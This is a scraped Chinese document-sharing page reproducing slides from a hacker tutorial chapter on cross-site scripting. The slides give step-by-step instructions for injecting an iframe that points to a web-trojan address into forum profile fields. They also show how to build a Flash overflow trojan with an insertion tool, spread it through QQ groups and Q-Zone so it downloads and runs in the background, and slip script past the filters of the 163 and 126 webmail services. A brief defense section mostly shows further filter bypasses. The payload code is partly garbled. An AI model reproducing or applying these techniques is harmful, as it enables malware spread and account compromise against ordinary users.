您好,欢迎访问三七文档
当前位置:首页 > 商业/管理/HR > 资本运营 > 黑客入门之跨网站攻击技术
黑客攻防秘技实战解析(第2版)跨网站攻击技术♂典型的跨站攻击实例演示♂跨站攻击技术演变♂邮箱跨站攻击♂搜索引擎的跨站攻击典型的跨站攻击实例演示具体的操作步骤如下:步骤1:打开动网论坛首页,如图6-1所示。先在论坛注册一个用户,单击【登录】按钮进行登录,登录后的界面如图6-2所示。典型的跨站攻击实例演示具体的操作步骤如下:步骤3:选择【用户控制面板】→【联系资料修改】菜单项,即可打开个人资料修改页面,如图6-3所示。步骤4:在“论坛密码”栏中输入论坛密码,在“主页地址”栏中输入代码“/ScriptIfRAMEheight=0width=0sRc=”http//网页木马地址”/IFrAME”。另外,还需要在“MSN号码”栏中输入代码:ScriptLanguage=JavaScriptvaractioninfo3='单帖屏蔽',如图6-4所示。典型的跨站攻击实例演示具体的操作步骤如下:步骤5:单击【更新】按钮,即可提交修改资料内容。若提交成功,即可弹出提示信息“你的修改信息已成功提交!”,如图6-5所示。步骤6:提交成功后返回论坛,回复或新发一篇帖子,帖子的内容可以随意填写。发表成功后再查看新发的帖子,即可发现在新发的帖子页面中已经嵌入了一个网页框架,在框架中显示了“新起点工作室”的页面,如图6-6所示。跨站攻击技术的演变1不安全的客户端过滤2编辑转换也可以跨站3Flash跳转的跨站攻击4Flash溢出跨站攻击Flash溢出跨站攻击1.制作Flash溢出木马步骤1:打开IcodeToSWF工具,单击“SWF文件”后面的【选择】按钮,选择本机上某个正常的Flash文件;在“插入代码”栏中填写刚才的网页木马的链接地址。步骤2:单击【给我插】按钮,即可将网页木马链接插入到正常的Flash文件中了,如图6-17所示。SWF插马工具生成的Flash文件是利用了一个IE漏洞,对方打开Flash文件后,就会造成IE溢出,自动访问木马网页在后台下载运行网页中的木马程序。Flash溢出跨站攻击2.在QQ群中挂马在新帖页面中单击【插入Flash】按钮,在弹出对话框中输入SWF木马文件的网络链接地址,并设置其尺寸大小,单击【插入】按钮插入Flash文件,如图6-18所示。在发表新帖子后,当有人在QQ群中打开查看这篇帖子时,就会自动播放Flash并在后台下载运行木马服务端了。当然,也可以直接在QQ群中散布SWF木马文件的网址,别人单击后一样会中木马,不过这种方式不如发表帖子隐蔽的效果好,攻击的持续性也不强。Flash溢出跨站攻击3.Q-Zone溢出跨站打开QQ空间后,在页面中单击【自定义】按钮,在自定义工具栏中单击【模块】选项卡,单击【新建模块】按钮,在其中选择新建一个Flash模块,在【添加Flash模块】对话框中的“Flash动画地址”栏中输入Flash溢出木马的网址,如图6-19所示。单击【确认】按钮,即可完成模块的添加。在提交自定义模块代码后,用户进入该QQ空间时会自动打开显示上传的SWF木马Flash,从而在后台下载运行木马服务端程序。邮箱跨站攻击1邮箱跨站的危害2国内主流邮箱跨站漏洞1.Tab绕过过滤:163邮箱跨站测试2.编码转换逃脱过滤:126邮箱的跨站测试Tab绕过过滤:163邮箱跨站测试对163邮箱进行跨站的操作步骤如下:步骤1:登录163免费邮箱,在“收件人”栏中填入要攻击的邮箱地址,主题可以任意填写,单击下方编辑窗口中的【全部功能】按钮展开全部功能项,从功能栏中单击【编辑源码】按钮,进入HTML代码编写状态,在其中输入测试代码imgsrc=javascript:window.open(')/,如图6-28所示。步骤2:单击【发送】按钮,即可发送邮件。当用户接收并查看邮件时,即可自动弹出百度的网页窗口,如图6-29所示。编码转换逃脱过滤:126邮箱的跨站测试对126邮箱进行跨站的操作步骤如下:步骤1:登录126免费邮箱,在“收件人”栏中填入要攻击的邮箱地址,主题可任意填写,单击下方编辑窗口中的【全部功能】按钮展开全部功能项,从功能栏中单击【编辑源码】按钮,即可进入HTML代码编写状态,在其中输入测试代码,如图6-30所示。步骤2:在编写完成后,单击【发送】按钮发送邮件,待发送成功后,当接收者在收到该邮件并进行查看时,就可看到测试效果了,在页面中被内嵌入了百度网页,如图6-31所示。跨站脚本攻击的防御(1)过滤“”和“”标记(2)HTML标记属性过滤(3)过滤特殊的字符:&、回车和空格(4)HTML属性跨站的彻底防范过滤特殊的字符:&、回车和空格其实上述过滤还是不完全的,因为HTML属性的值,可支持“ASCii”的形式进行表示,如前面的跨站代码可以换成如下代码,如图6-33所示。imgsrc=javascript:alert(/跨站攻击/)width=100过滤特殊的字符:&、回车和空格转换代码后即可突破过滤程序,继续进行跨站攻击了。有安全意识的程序又会继续对此漏洞进行弥补过滤,使用“replace(str,&,&)”代码将“&”符替换成“&”,于是后面语句便全部变形失效了。但攻击者又可能采用另外方式绕过过滤,因为过滤关键字方式漏洞很多。攻击者可能会构造“imgsrc=javascript:alert(/跨站攻击/)width=100”攻击代码,如图6-34所示。专家课堂(常见问题与解答)点拨1:为什么在使用“getURL(***.com);”语句时,没有输入后面的分号“;”就提示语法错误?解答:Actionsacript的每行语句都以分号“;”结束,它不同于BASIC语言,Actionscript语句同C++、Java、Pascal一样允许分多行书写,即允许将一条很的长语句分割成两个或更多代码行,只要在结尾有个分号就行了。点拨2:为什么有些代码中将一些关键字符使用一个空格分隔开了(如javascript)?解答:在某些代码中使用空格将部分关键字符分隔开,这些空格是使用Tab键产生的,是为了逃脱过滤机制,从而顺利进行攻击。本章结束,谢谢观赏
本文标题:黑客入门之跨网站攻击技术
链接地址:https://www.777doc.com/doc-3234424 .html